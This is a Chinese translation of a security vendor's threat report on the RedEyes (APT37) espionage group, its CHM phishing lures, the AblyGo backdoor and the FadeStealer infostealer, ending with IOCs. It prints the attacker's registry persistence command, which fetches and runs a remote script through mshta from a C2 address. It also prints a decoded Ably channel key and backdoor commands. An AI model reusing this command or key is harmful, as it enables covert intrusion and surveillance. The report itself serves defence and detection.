原文鏈接:https://asec.ahnlab.com/en/54349/
譯者:知道創宇404實驗室翻譯組

1.概述

RedEyes(也被稱為APT37、ScarCruft、Reaper)是一個由國家支持的APT組織,主要針對脫北者、人權活動家、大學教授等個人進行攻擊。他們的任務是監視特定個體的生活。2023年5月,AhnLab安全應急響應中心(ASEC)發現RedEyes組織部署了一個全新的、具有竊聽功能的Infostealer,同時還使用了由GoLang開發、以Ably平臺為載體的后門。

*Ably[1]是一個實時數據傳輸和消息傳遞的平臺。它還可以發布/訂閱消息、推送通知、進行實時查詢和狀態同步。

攻擊者通過使用Ably服務的GoLang后門發送命令。命令通信所需的API密鑰值保存在GitHub存儲庫中。此API密鑰值對于攻擊者頻道通信而言是必需的,只要知道此密鑰值,任何人都可以訂閱該頻道。因此,部分被攻擊者使用的命令在分析時可以被識別出來。

ASEC旨在分享RedEyes組織在2023年5月的攻擊中使用的戰術、技術和程序(TTPs)。從最初的入侵技術,一直到權限升級、命令、控制以及滲透,本文涵蓋了RedEyes用于監視個人信息的每個階段。

圖1.RedEyes攻擊流程

2.分析

2.1首次訪問

該組織使用CHM(編譯的HTML幫助文檔)文件來執行他們的初始攻擊。與今年3月份“偽裝成密碼文件的惡意軟件被黑客分發”[2]事件類似,攻擊者可能是通過帶有普通密碼保護文檔,以及附有偽裝成密碼文件的CHM惡意軟件的釣魚郵件來接近目標用戶的。換句話說,攻擊者將CHM惡意軟件與普通密碼受保護的文檔進行壓縮,使用戶相信必須執行CHM文件才能查看受密碼保護的文檔。

圖2. 誘餌文件和惡意CHM文件

當用戶執行CHM文件時,他們可以看到如圖3所示的密碼信息。然而,如圖4所示的CHM中的內部腳本代碼會觸發MSHTA.exe的執行,這會導致來自攻擊者的C&C服務器惡意腳本也被執行。

圖3. CHM文件內容
圖4. CHM中的腳本代碼

在分析過程中獲得的惡意腳本被確認為PowerShell惡意軟件,它通過使用自動運行注冊表項來維持持久性。它還擁有一個后門。

圖5. 從攻擊者服務器下載的PowerShell腳本(后門)

2023年2月的帖子“使用加密技術的HWP惡意軟件”[3]中證實的PowerShell惡意軟件具有相對簡單的功能。它能夠執行攻擊者的命令并使用CMD.exe發送結果,以及為了持久性而注冊到RUN鍵注冊表。最近獲得的PowerShell惡意軟件仍然使用相同的注冊表項注冊來保持持久性,但是它不使用CMD.exe,而是根據C&C服務器命令執行不同的行為。這些特性如下表1所示。

命令 方法
fileinfo 將CSV格式下指定路徑下的文件列表及文件名稱、文件大小、修改時間等信息發送到命令控制服務器,并刪除CSV文件
dir 將指定路徑下的文件夾進行壓縮,并將壓縮后的文件發送給命令與控制服務器,然后再刪除該文件
file 上傳指定文件到命令與控制服務器
down 將文件下載到指定路徑
regedit 編輯注冊表的特性
task 特性注冊到任務調度器,以便每隔10分鐘重復執行一次
zip 解壓縮特定路徑中的文件
rename 特性來更改特定文件的名稱
del 刪除指定路徑下的文件

表1. PowerShell后門功能

2.2. 持久性

MSHTA.exe執行的惡意PowerShell腳本使用以下命令在自動運行注冊表項上注冊自己,即使在系統重新啟動后,也允許攻擊者的C&C服務器惡意腳本執行。

New-ItemProperty -Path   
HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name kcJuWlrQO -Value ‘c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 569782 2.2.2.2 || mshta hxxp://172.93.181[.]249/control/html/1.html’ -PropertyType String -Force;

2.3. 命令與控制

攻擊者通過基于GoLang的Ably平臺服務的后門進行了后期攻擊階段,如權限升級、泄露和惡意軟件分發。Ably平臺能夠實時傳輸數據,任何擁有通道認證密鑰的人都可以訪問該通道來接收消息。在分析過程中,ASEC設法得到了攻擊者通道的身份驗證密鑰,并查看了發送給目標的一些命令。

發送時間 執行的命令
2023-05-09 10:16:16 forfiles /p c:\programdata
2023-05-09 10:49:47 ren c:\programdata\wallpaper-river.jpg wallpaper-river.exe
2023-05-09 10:49:53 forfiles /p c:\programdata
2023-05-09 10:50:09 wmic OS get Caption,CSDVersion,OSArchitecture,Version
2023-05-09 10:50:35 c:\programdata\wallpaper-river.exe

表2. 通過AblyGo后門執行的命令

此前,KISA[4]Sekoia[5]曾報道過RedEyes組織使用Ably發送命令。當時發現的基于Ably平臺的GoLang后門在其二進制文件中包含身份驗證密鑰,如圖6所示,但是在此案例中獲得的后門將身份驗證密鑰保存在GitHub存儲庫中,允許動態接收身份驗證密鑰以進行通道通信。這樣做的目的可能為了Ably 通道身份驗證密鑰能夠經常更改,并防止第三方讀取通道消息。

圖6. 硬編碼認證密鑰信息(以前的AblyGo后門)
圖7. 使用GitHub查找認證密鑰功能 (AblyGo后門變體)
(GitHub URL:https://raw.githubusercontent.com/thanks023/hello/main/ReadMe.txt)

GoLang后門訪問存在于其二進制中的GitHub URL,并檢索“<> base64編碼的通道認證密鑰”格式的數據,以獲得Ably通道認證密鑰。這種方法也可以在zscaler于2023年3月發表的“The Unintentional Leak: A glimpse into The attack vectors of APT37”[6]中看到(圖4)。根據這篇文章,攻擊者經常用BASE64.編碼的字符串來對圖4中所示的字符串進行解密,從而得到Ably身份驗證密鑰值。

[GitHub Commit String] <>S3dITXZ3LmJvaUMzdzpqR2JmMDd3VW9iN3RGanoxM1dxRFE4WJRsVFBDbVBQdldzb3hZYjFxc21r
[GitHub Decrypted String] <>KwHMvw.boiC3w:jGbf07wUob7tFjz13WqDQ8X.lTPCmPPvWsoxYb1qsmk (Ably authentication key)

如果AblyGo后門在受感染的系統上被執行,那么它會在GitHub中檢索“<>認證密鑰”,隨即便用圖7中的代碼解析“<>”來解碼BASE64.后面的字符串。通過解碼的身份驗證密鑰值可以訪問攻擊者的Ably通道,其中名為“UP”和“DOWN”的消息會被發送和接收。發送和接收數據的格式以及特征見表3。

消息名稱(特征) 數據格式
發送HELLO并上傳命令結果 {“Id”:”PC Name”,”Textdata”:”SEVMTw==”}
發送CMD命令 {“Id”:”PC Name”,”Textdata”:”SEVMTw==”}

表3. AblyGo后門發送和接收信息的格式和特點

AblyGo在被感染的PC上執行后,便以大約2到5分鐘的間隔發送用BASE64.編碼的“HELLO”數據,以表示PC已連接到攻擊者的Ably通道(消息名稱:UP)

攻擊者不僅監視Ably通道,還會對受感染PC的ID進行識別,再用BASE64.編碼來命令并再次傳輸到PC(消息名稱:DOWN)。

從C&C服務器接收到的執行命令完全通過CMD.exe完成,該CMD命令的結果用“UP”消息傳回通道。換言之,攻擊者用“UP”來識別受感染PC、接收命令結果,用“DOWN”來發出命令的消息。

2.4 權限升級

在發布命令和控制之后,攻擊者使用名為T1546.015(事件觸發執行:組件對象模型劫持)的已知權限升級技術來執行其他惡意軟件。如圖8所示,注冊到注冊表項的惡意軟件將無法得到保障。

圖8. 權限升級技術(T1546.015)

2.5 滲透

攻擊者最終利用AblyGo后門和MSTHA PowerShell,以無文件形式來執行Infostealer。

圖9. FadeStealer執行流程
圖10. AhnLab端點檢測響應(EDR)的檢測畫面(流程樹結構)

被執行的Infostealer具有各種功能,例如截圖、從可移動媒體設備和智能手機中竊取數據、鍵盤記錄和竊聽。

圖11. 被添加到FadeStealer的竊聽功能

ASEC根據泄露數據存儲的文件夾名稱的特點,將這種新發現的惡意軟件命名為FadeStealer (Fade as a stealer)。FadeStealer在%temp%目錄中為每個泄露的數據創建單獨的文件夾。它利用文件內集成的RAR壓縮應用程序,每隔30分鐘都使用密碼來壓縮受感染PC泄漏的數據。FadeStealer采用了細致的拆分壓縮的方式,如果壓縮文件大小超過1gb,則會自動將每個文件的容量限定在1gb以內。

文件夾路徑 泄露的信息
%temp%\VSTelems_Fade\NgenPdbc 截屏
%temp%\VSTelems_Fade\NgenPdbk 鍵盤記錄
%temp%\VSTelems_Fade\NgenPdbm 麥克風竊聽
%temp%\VSTelems_FadeIn 智能手機設備的數據收集
%temp%\VSTelems_FadeOut 可移動媒體設備

表4. 文件夾路徑和泄露的數據

圖12. AhnLab EDR(利用RAR壓縮工具竊取信息)的檢測畫面

壓縮項 方法說明
a 添加到壓縮文件
r 恢復壓縮文件
ep1 從名稱中刪除基目錄
m0 設置壓縮級別(保存)
y 對所有問題自動回答“是”
p NaeMhq[d]q 設置壓縮密碼為NaeMhq[d]q
v1g 將壓縮卷限制設置為1gb

表5. 壓縮選項

圖13. 在威脅行為者的服務器上發現的被盜的個人信息

3.總結

RedEyes組織的攻擊對象是脫北者、人權運動家、大學教授等特定群體,他們的主要目標是竊取信息。在最近的這次攻擊中,ASEC團隊發現了一個具有竊聽麥克風功能的Infostealer。在韓國,未經授權對個人進行竊聽的行為被視為侵犯他人隱私,并受到法律的嚴格管制。盡管如此,黑客還是監控了受害者在電腦上的一舉一動,甚至進行了竊聽。

如果您對本案例的整個攻擊流程進行檢驗,就會發現攻擊者巧妙而精確地完成了攻擊:通過釣魚郵件訪問目標系統并使用Ably通道作為命令和控制服務器,這類攻擊很難被個人察覺。ASEC正在密切跟蹤RedEyes的行動,并迅速對其作出反應,防止損失擴大。

用戶要避免打開來歷不明的文件,以防黑客入侵,近期尤為如此。該組織最近一直在使用基于CHM和LNK擴展名的惡意軟件來執行他們初始入侵。在運行電子郵件附件時,應該特別注意文件擴展名名稱。文件擴展名默認設置為隱藏,建議參考圖14,取消勾選“隱藏已知文件類型的擴展名”。如果附加文件的后綴名是CHM或LNK,那么在執行它們之前驗證電子郵件的來源是至關重要的。

圖14. 取消選中“隱藏已知文件類型的擴展名"

4.參考文獻

[1]Ably
[2]Malware Distributed Disguised as a Password File
[3] HWP Malware Using the Steganography Technique: RedEyes (ScarCruft)
[4] TTPs $ ScarCruft Tracking Note – KISA
[5]Peeking at Reaper’s surveillance operations – sekoia
[6] The Unintentional Leak: A glimpse into the attack vectors of APT37 – zscaler

[IOC]
[MD5]
[CHM]

1352abf9de97a0faf8645547211c3be7

[Powershell Backdoor]
1c1136c12d0535f4b90e32aa36070682

[AblyGo Variant]
msedgeupdate.ini (3277e0232ed6715f2bae526686232e06)
msedgeupdate.ini (3c475d80f5f6272234da821cc418a6f7)

[Dll Sideloading – Loader]
mfc42u.dll (59804449f5670b4b9b3b13efdb296abb)

[FadeStealer]
DESKTOP.lNl (f44bf949abead4af0966436168610bcc)

[File Detection]
Trojan/Win.Goably.C5436296 (2023.06.03.00)
Trojan/Win.Goably.C5422375 (2023.05.09.02)
Trojan/Win.Loader.C5424444 (2023.05.09.02)
Data/BIN.RedEyes (2023.06.08.01)
Downloader/CHM.Generic (2023.06.02.03)
Downloader/PowerShell.Generic (2023.06.06.00)

[Behavior Detection]
Injection/EDR.Event .M11124

[Exfiltrated Data Save URL]
hxxp://172.93.181[.]249/control/data/

[AblyGo Backdoor Upload Path]
hxxp://172.93.181[.]249/file/

[PowerShell Backdoor Download URL After Initial Breach Stage]
hxxp://172.93.181[.]249/control/html/1.html


Paper 本文由 Seebug Paper 發布,如需轉載請注明來源。本文地址:http://www.bjnorthway.com/2086/